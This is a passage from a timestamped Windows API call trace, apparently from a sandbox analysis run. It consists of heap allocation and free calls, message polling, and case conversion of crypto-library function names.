| out: hHeap=0x1780000) returned 1 [0097.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0097.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0097.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0097.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4bf9) returned 0x451ac18 [0097.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0097.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0097.293] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0097.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0097.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0097.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0097.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0097.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4bf9) returned 0x4516010 [0097.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0097.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0097.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0097.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0097.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0097.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0097.294] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0097.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0097.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0097.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0097.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0097.294] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0097.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0097.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0097.294] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0097.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0097.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0097.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0097.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2620 [0097.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0097.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0097.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0097.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0097.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4bf9) returned 0x4516010 [0097.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0097.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0097.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2580 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0097.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0097.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f20 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4bf9) returned 0x451f820 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0097.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0097.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0097.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0097.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0097.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0097.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0097.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0097.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0097.296] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0097.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0097.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0097.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0097.296] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0097.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0097.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0097.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0097.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0097.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0097.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0097.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0097.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0097.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0097.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0097.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0097.296] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0097.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0097.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0097.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0097.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca238 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0097.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0097.297] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0097.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0097.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0097.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0097.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0097.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0097.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0097.298] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0097.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0097.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0097.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0097.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0097.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0097.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0097.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0097.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0097.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0097.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0097.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0097.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0097.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0097.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0097.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0097.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0097.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0097.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0097.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0097.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0097.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0097.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.299] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0097.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0097.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0097.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0097.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0097.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0097.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0097.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0097.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0097.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0097.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0097.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0097.299] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0097.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca298 [0097.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0097.299] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0097.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0097.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0097.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0097.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0097.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0097.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0097.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0097.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0097.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0097.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0097.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0097.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0097.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0097.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0097.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0097.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0097.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0097.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0097.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0097.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0097.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0097.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0097.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0097.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0097.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0097.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0097.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0097.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0097.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0097.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0097.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0097.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0097.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0097.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0097.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0097.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0097.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.302] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0097.302] HeapFree (in: 